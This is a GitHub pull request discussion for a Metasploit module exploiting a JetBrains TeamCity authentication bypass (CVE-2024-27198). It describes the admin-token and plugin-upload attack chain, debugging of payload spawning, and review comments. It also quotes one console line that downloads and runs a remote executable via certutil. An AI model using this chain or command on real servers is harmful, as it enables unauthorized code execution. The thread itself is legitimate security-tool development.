New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
JetBrains TeamCity Unauthenticated RCE exploit module (CVE-2024-27198) #18922
Conversation
…so we can fall back on creating an admin user accoutn before we upload the plugin. Creating an access token is better as we can delete the token, unlike the user account.
…optionally add soem charachters before the trailing .jsp
For some doubts about CVE-2024-27198, please see https://github.com/W01fh4cker/CVE-2024-27198-RCE?tab=readme-ov-file#-problem for details. |
… the plugin will block. We can still get a session if we fall through here. We cant delete the plugin as access will block because we did not spawn.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit [] Command to run on remote host: certutil -urlcache -f http://192.168.1.33:12012/oiB8zh7giZOuuW2r9fc7rw %TEMP%\FMjRYTscXcH.exe & start /B %TEMP%\FMjRYTscXcH.exe |
per @sec13b comment above:
The exploit is untested against Getting |
There is an unknown problem with the Java payload against Linux (target 0). As of commit 0513654 a Java payload will work on Linux only if the Spawn advanced option is zero ( The issue that is breaking Java payloads on Linux, appears to be related to how Payload.java handles spawning a new Java process to run the payload. Below we can see the payload working if spawn is zero, but as the payload didn't spawn to a new process, all access to the upload plugin blocks (because the payload is running in that thread), so the exploit cannot delete the payload. Also it is non-obvious to the user to set spawn to zero.
If we set Spawn to the default value of 2 and run the exploit, we can see via There is no evidence the dropped payload runs a second time (or a third which would actually stage the payload). I'm testing on Ubuntu 22.0.4 and OpenJDK 11:
An abridged
TeamCity server is run as a user |
… runnign teh payload in a thread, and forcing teh default optiosn for Spawn to be 0
Commit 1e371d0 resolves the Java payload issue on Linux by leveraging the PayloadServlet and running the Java payload in a new thread, while setting the default options for Spawn to be 0 (so it does not drop to disk). Works great on both Linux and Windows. We can note from below, our Meterpreter is now executing in the TeamCity server process.
|
Thanks @sfewer-r7 for all these details. It is likely to be the issue reported in this issue and this info will help a lot. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you @sfewer-r7 for this module! I left a few minor comments for now and I will start to test it.
There is one more thing I think would improve readability. I'm wondering if it's possible to reduce the size of the exploit
method. I believe a few things can be done:
- avoid nested
if
/else
andbegin
/rescue
/ensure
blocks as much as possible - break down the code in multiple methods with descriptive names
- use custom exceptions in methods, which can be handled in the main
exploit
method.
modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2024_27198.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2024_27198.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2024_27198.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2024_27198.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2024_27198.rb
Outdated
Show resolved
Hide resolved
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…login Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
… create_payload_plugin and auth_new_admin_user. several if/unless blocks were flattened to be inline if/unless
Thanks @cdelafuente-r7 for the great feedback. I think I have addressed all of your suggestions/questions.
I added commit 6d84f0e which reduces the |
Thank you for updating this @sfewer-r7 ! Everything looks good to me now. I tested against version 2023.11.3 in a Docker installation and on Windows Server 2019, and verified I got a session with each target. I'll go ahead and land it.
Target 0 (Java) - Windows Server 2019
Target 1 (Java Server Page) - Windows Server 2019
Target 2 (Windows Command) - Windows Server 2019
Target 0 (Java) - Linux (Docker) - Windows Server 2019
Target 1 (Java Server Page) - Linux (Docker)
Target 3 (Linux Command) - Linux (Docker)
Target 4 (Unix Command) - Linux (Docker)
|
Release NotesThis adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables to access the REST API and create a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload. |
This module exploits an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198). An unauthenticated attacker can leverage this to access the REST API and create a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload, allowing the attacker to achieve unauthenticated RCE on the target TeamCity server. On older versions of TeamCity, access tokens do not exist so the exploit will instead create a new administrator account before uploading a plugin. Older version of TeamCity have a debug endpoint (
/app/rest/debug/process
) that allows for arbitrary commands to be executed, however recent version of TeamCity no longer ship this endpoint, hence why a plugin is leveraged for code execution instead, as this is supported on all versions tested.For a full technical analysis of the vulnerability, please read our AttackerKB Analysis or our disclosure blog post.
The module has been tested against:
and has targets for the Java, Java Server Page, and command architectures, running on the Windows, Linux, and Unix platforms.
Example